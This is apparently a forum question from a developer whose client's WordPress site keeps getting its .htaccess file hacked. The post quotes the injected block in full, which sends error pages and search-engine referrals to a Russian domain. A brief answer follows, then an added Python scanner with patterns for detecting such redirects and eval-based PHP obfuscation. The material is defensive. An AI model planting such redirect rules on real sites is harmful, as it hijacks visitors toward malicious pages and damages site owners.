Linux – wordpress .htaccess file hacked

.htaccess, godaddy, linux, shared-hosting, wordpress

I'm stumped. My client's WordPress site keeps having its .htaccess file hacked. It's adding code to redirect all traffic from search engines to different sites. It keeps changing the domain it's redirecting to. Currently (don't visit this site! prime-vermond.ru)

I have changed FTP passwords, WordPress admin passwords, updated all plugins, removed unused plugins, and changed file permissions of the .htaccess file to 444.

I'm thinking it might be a server exploit? The client's site is hosted with GoDaddy. I emailed them several times, waiting for a response on my latest support ticket.

I have run a search of all files looking for what might have malicious code in it but came up with nothing. I'm assuming they have the code base64 encoded and are using eval to run it.

Any ideas on how to better find a modified bad file? I'm at a loss now =/

Below is the entire code being added to the .htaccess file:

ErrorDocument 400 http://prime-vermond.ru/trast/index.php
ErrorDocument 401 http://prime-vermond.ru/trast/index.php
ErrorDocument 403 http://prime-vermond.ru/trast/index.php
ErrorDocument 404 http://prime-vermond.ru/trast/index.php
ErrorDocument 500 http://prime-vermond.ru/trast/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://prime-vermond.ru/trast/index.php [R=301,L]

Best Answer

Either your application code is being exploited or someone has phished/guessed your account credentials. Make sure your wp code is up to date, including any plugins, and make sure you change your account password.
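
For the question of how to find the modified files, the following is an added example and not part of the original question or answer: a scanner that flags `.htaccess` files carrying the two constructs seen in the injected block (off-site `ErrorDocument` targets and referer-gated external redirects) and PHP files that `eval` decoded data, newest first. The function names, the `own_hosts` parameter, the PHP pattern and the `bad.example` sample are assumptions made for illustration.

```python
import os
import re
from urllib.parse import urlparse

# PHP_OBF encodes the asker's guess (eval over decoded data); it is an assumption.
ERRDOC = re.compile(r'^\s*ErrorDocument\s+\d{3}\s+(https?://\S+)', re.I)
REFCOND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}', re.I)
RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+(\S+)', re.I)
PHP_OBF = re.compile(rb'(eval|assert)\s*\(\s*(base64_decode|gzinflate)\s*\(', re.I)

# Constructed sample: shortened injected block, then a stock WordPress rule.
SAMPLE = """\
ErrorDocument 404 http://bad.example/trast/index.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://bad.example/trast/index.php [R=301,L]
RewriteRule . /index.php [L]
"""

def scan_htaccess(text, own_hosts=()):
    """Return (line_no, reason) for off-site ErrorDocument and referer-gated redirects."""
    findings, conds = [], 0
    for no, line in enumerate(text.splitlines(), 1):
        m = ERRDOC.match(line)
        if m and urlparse(m.group(1)).hostname not in own_hosts:
            findings.append((no, f"ErrorDocument -> {urlparse(m.group(1)).hostname}"))
        conds += bool(REFCOND.match(line))
        m = RULE.match(line)
        if m:
            host = urlparse(m.group(1)).hostname  # None for local targets
            if conds and host and host not in own_hosts:
                findings.append((no, f"referer-gated redirect ({conds} conds) -> {host}"))
            conds = 0  # RewriteCond lines apply only to the next RewriteRule
    return findings

def scan_tree(root, own_hosts=()):
    """Walk root; return [(mtime, path, findings)], newest first."""
    report = []
    for d, _, files in os.walk(root):
        for path in (os.path.join(d, n) for n in files if n == ".htaccess" or n.endswith(".php")):
            with open(path, "rb") as fh:
                data = fh.read()
            if path.endswith(".htaccess"):
                hits = scan_htaccess(data.decode("utf-8", "replace"), own_hosts)
            else:
                hits = [(0, "eval of decoded data")] if PHP_OBF.search(data) else []
            if hits:
                report.append((os.path.getmtime(path), path, hits))
    return sorted(report, reverse=True)
```

Run `scan_tree()` against the web root with the site's own hostnames in `own_hosts`; the modification times in the result give a window to compare against the access and FTP logs.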
